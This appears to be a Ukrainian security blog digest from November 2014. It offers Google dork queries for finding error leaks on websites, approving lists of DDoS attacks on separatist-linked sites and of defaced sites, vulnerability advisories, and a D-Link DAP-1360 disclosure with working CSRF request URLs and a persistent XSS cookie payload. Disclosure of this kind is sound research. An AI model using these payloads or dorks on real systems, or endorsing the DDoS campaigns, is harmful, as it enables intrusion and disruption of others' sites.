“Error” Google хакінг №5

23:52 28.11.2014

Продовжу тему “Error” Гугл хакінга (”Error” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “еррор” пошукових запитів:

“Out of memory Needed”

“Fatal error: Out of memory”

“Fatal error” “not found”

“Fatal error” “no such file”

“Fatal error” “does not exist”

“db do failed”

“Could not execute query”

“DBD::mysql::st execute failed”

“ODBC Error Code”

“Oracle Error Code”

Листопадові DDoS атаки на сайти ДНР і ЛНР

22:44 28.11.2014

У жовтні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у листопаді.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на без-вести.рф - 01-16.11.2014
DDoS на ungu.org - 01-16.11.2014
DDoS на pravdatoday.info - 01-16.11.2014
DDoS на bne.su - 01-16.11.2014
DDoS на lvs-global.ru - 01-16.11.2014
DDoS на slemtt.myjino.ru - 01-16.11.2014
DDoS на odessa-antimaydan.com - 01-16.11.2014
DDoS на cik-lnr.info - 02-03.11.2014
DDoS на molotpravdu.com - 02-10.11.2014 і 16.11.2014
DDoS на vineyardsaker.ru - 09-13.11.2014
DDoS на real-info.info - 12-13.11.2014
DDoS на ispomodnr.ru - 16.11.2014

Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

Обхід обмежень в Microsoft IIS

20:12 28.11.2014

Виявлена можливість обходу обмежень в Microsoft IIS.

Уразливі продукти: Microsoft Internet Information Services 8.0, Internet Information Services 8.5.

Можна обійти обмеження по IP і доменам в IIS.

  • Microsoft Security Bulletin MS14-076 - Important Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) (деталі)

Добірка експлоітів

17:29 28.11.2014

В даній добірці експлоіти в веб додатках:

  • Mulesoft ESB Runtime 3.5.1 Privilege Escalation / Code Execution Vulnerabilities (деталі)
  • TestLink 1.9.12 Multiple Vulnerabilities (деталі)
  • Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability (деталі)
  • vBulletin 5.1.2 SQL Injection Exploit 0day (деталі)
  • Kolibri WebServer 2.0 - GET Request SEH Exploit (деталі)

Похакані сайти №278

22:42 27.11.2014

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://cses.gov.ua (хакером Fatal Error) - 27.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://snigiryevka-rada.gov.ua (хакером PaWL) - 05.10.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://tas.zp.ua (хакером Silo)
  • http://эталонпринт.com.ua (хакером DARKWAR2) - 28.10.2014, зараз сайт вже виправлений адмінами
  • http://www.tiraz.biz.ua (хакером Index Php) - 05.11.2014, зараз сайт вже виправлений адмінами

Витік інформації в cURL і libcurl

20:01 27.11.2014

Виявлений витік інформації в cURL і libcurl.

Уразливі продукти: cURL 7.38, libcurl 7.38.

Витік умісту пам’яті через POST-запит.

Добірка уразливостей

16:20 27.11.2014

В даній добірці уразливості в веб додатках:

CSRF та XSS уразливості в D-Link DAP-1360

23:52 26.11.2014

21.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

26.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - MAC filter - Filter mode можна змінити параметр MAC filter restrict mode:

Disabled:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

Allow:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

Deny:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

В розділі Wi-Fi - MAC filter - MAC addresses можна додавати і видаляти MAC адреси:

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

XSS (persistent XSS) (WASC-08):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

Код спрацює на http://192.168.0.50/index.cgi#wifi/mac.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.

Вийшов WordPress 4.0.1

22:47 26.11.2014

У листопаді, 20.11.2014, вийшла нова версія WordPress 4.0.1.

WordPress 4.0.1 це багфікс та секюріті випуск нової 4.0 серії. В якому розробники виправили 23 баги та 10 уразливостей. Серед виправлених уразливостей:

  • виправлені 3 XSS уразливості, що можуть бути використані користувачами з правами contributor чи author.
  • виправлена Cross-Site Request Forgery уразливість, що дозволяє провести атаку на користувача для зміни пароля.
  • виправлена Denial of Service уразливість при перевірці паролів.
  • доданий додатковий захист проти Server-Side Request Forgery.
  • виправлена дуже маловірогідна колізія хешів, що дозволяла скомпрометувати акаунт користувача.
  • тепер лінки в листах для зміни паролю стають недійсними, якщо користувач змінив свій емайл.
  • виправлені дві уразливості при перевірці EXIF даних при завантаженні зображень, що розробники назвали “security hardening”.

У WordPress 3.9.2 та попередніх версіях виявлена Cross-Site Scripting уразливість в функції коментування. Для гілок 3.7.x, 3.8.x і 3.9.x були випущені версії 3.7.5, 3.8.5 і 3.9.3 з виправленням даної XSS уразливості.

DoS проти Ruby

20:05 26.11.2014

Виявлена моживість проведення DoS атаки проти Ruby.

Уразливі версії: Ruby 2.1.

Вичерпання ресурсів при розборі XML. Пошкодження пам’яті в encodes().